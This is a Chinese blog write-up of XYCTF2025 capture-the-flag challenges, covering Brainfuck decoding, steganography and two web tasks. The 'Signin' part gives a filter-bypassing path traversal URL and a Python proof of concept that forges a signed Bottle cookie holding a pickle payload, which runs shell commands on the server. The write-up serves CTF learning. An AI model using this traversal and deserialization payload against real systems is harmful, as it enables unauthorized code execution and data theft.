XYCTF2025部分题目补做

进行一个小题补做,写一部分WriteUp.

MISC

签个到吧

点击查看代码 
1
>+++++++++++++++++[<++++++>-+-+-+-]<[-]>++++++++++++[<+++++++++>-+-+-+-]<[-]>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++[<+>-+-+-+-]<[-]>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++[<+>-+-+-+-]<[-]>+++++++++++++++++++++++++++++++++++++++++[<+++>-+-+-+-]<[-]>+++++++++++++++++++++++++++++[<+++>-+-+-+-]<[-]>+++++++++++++++++[<+++>-+-+-+-]<[-]>++++++++++++[<+++++++++>-+-+-+-]<[-]>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++[<+>-+-+-+-]<[-]>++++++++[<++++++>-+-+-+-]<[-]>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++[<+>-+-+-+-]<[-]>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++[<+>-+-+-+-]<[-]>+++++++++++++++++++[<+++++>-+-+-+-]<[-]>+++++++++++++++++++++++++++++[<++++>-+-+-+-]<[-]>++++++++[<++++++>-+-+-+-]<[-]>+++++++++++++++++++[<+++++>-+-+-+-]<[-]>+++++++++++[<++++++++>-+-+-+-]<[-]>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++[<+>-+-+-+-]<[-]>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++[<+>-+-+-+-]<[-]>++++++++++++[<+++++++>-+-+-+-]<[-]>++++++++++[<+++++++>-+-+-+-]<[-]>+++++++++++++++++++[<+++++>-+-+-+-]<[-]>++++++++++[<+++++>-+-+-+-]<[-]>++++++++[<++++++>-+-+-+-]<[-]>++++++++++[<+++++>-+-+-+-]<[-]>+++++++++++++++++++++++++++++++++++++++++++++++++++++[<+>-+-+-+-]<[-]>+++++++++++++++++++[<+++++>-+-+-+-]<[-]>+++++++++++++++++++++++[<+++>-+-+-+-]<[-]>+++++++++++[<++++++++++>-+-+-+-]<[-]>+++++++++++++++++++++++++++++++++++++++++++++++++++++[<++>-+-+-+-]<[-]>++++++++[<++++++>-+-+-+-]<[-]>+++++++++++[<+++++>-+-+-+-]<[-]>+++++++++++++++++++[<+++++>-+-+-+-]<[-]>+++++++[<+++++++>-+-+-+-]<[-]>+++++++++++++++++++++++++++++[<++++>-+-+-+-]<[-]>+++++++++++[<+++>-+-+-+-]<[-]>+++++++++++++++++++++++++[<+++++>-+-+-+-]<[-]

很明显的BrainFuck代码,根据BrainFuck代码的逻辑:

Brainfuck C
> ++ptr;
< –ptr;
+ ++*ptr;
- –*ptr;
. putchar(*ptr);
, *ptr =getch();
[ while (*ptr) {
] }

发现里面存在很多[-],其意思就是相当于把整个数组清零. 因此尝试在清零之前时输出,即将[-]替换为.[-],观察输出结果:

1
flag{W3lC0me_t0_XYCTF_2025_Enj07_1t!}

曼波曼波曼波

里面有一个图片和一个文本文档,图片是一个二维码,扫完是fake_flag,没有任何有效信息. txt里面有一个类似base64的编码,末尾填充的等号在最前面. 于是尝试反转内容再解码,获得一张图片.

发现里面隐藏了一个压缩包,将其解开发现一个图片和另一个压缩包. 其中有一个提示,指示密码为比赛名称+年份.

解出的图片和前面的图片一致,但大小不同. 猜测是盲水印,进行提取得到flag.

WEB

ez_puzzle

F12无法打开开发工具,可以在浏览器地址栏旁的更多工具处打开.

代码进行了混淆,但发现里面有一个函数checkIfFinish,尝试将其返回值改成1(使用抓包工具拦截修改),点击一下拼图即可获得flag.

Signin

源码审计. 发现/secret路由里面存在一个get_cookie函数,其调用了pickle反序列化.

因此需要读取其中的secret. 在/download路由中,不允许以/../开头,也不允许使用\和两个连续的../. 因此采用./../的形式进行目录穿越.

1
http://***/download?filename=./.././../secret.txt

然后构造poc获取目录内容(由于不能回显,需要先将结果写入一个文件再利用/download路由读取这个文件):

1
2
3
4
5
6
7
8
9
10
from bottle import Bottle, request, response, redirect, static_file, run, route
import requests
secret='Hell0_H@cker_Y0u_A3r_Sm@r7'
class Email():
	def __reduce__(self):
		return (eval,("__import__('os').popen('ls / > /name').read()",))
response.set_cookie("name",{ "name":Email() },secret=secret)
# print(response)
s = requests.Session()
s.get("http://***/secret",cookies={ "name":"!KuTZWGXqeoroxwNIGMiyBE1PBqmJqZ1BCGypqOzUuGo=?gAWVWQAAAAAAAABdlCiMBG5hbWWUfZRoAYwIYnVpbHRpbnOUjARldmFslJOUjC1fX2ltcG9ydF9fKCdvcycpLnBvcGVuKCdscyAvID4gL25hbWUnKS5yZWFkKCmUhZRSlHNlLg==" })

最后仍然利用/download读取这个文件的内容即可.

XYCTF2025部分题目补做
本文链接:http://blog.ac1liu.tech/p/6c47b3eb.html
发布时间
2025年6月23日
许可协议
转载说明
请注明出处!
发表评论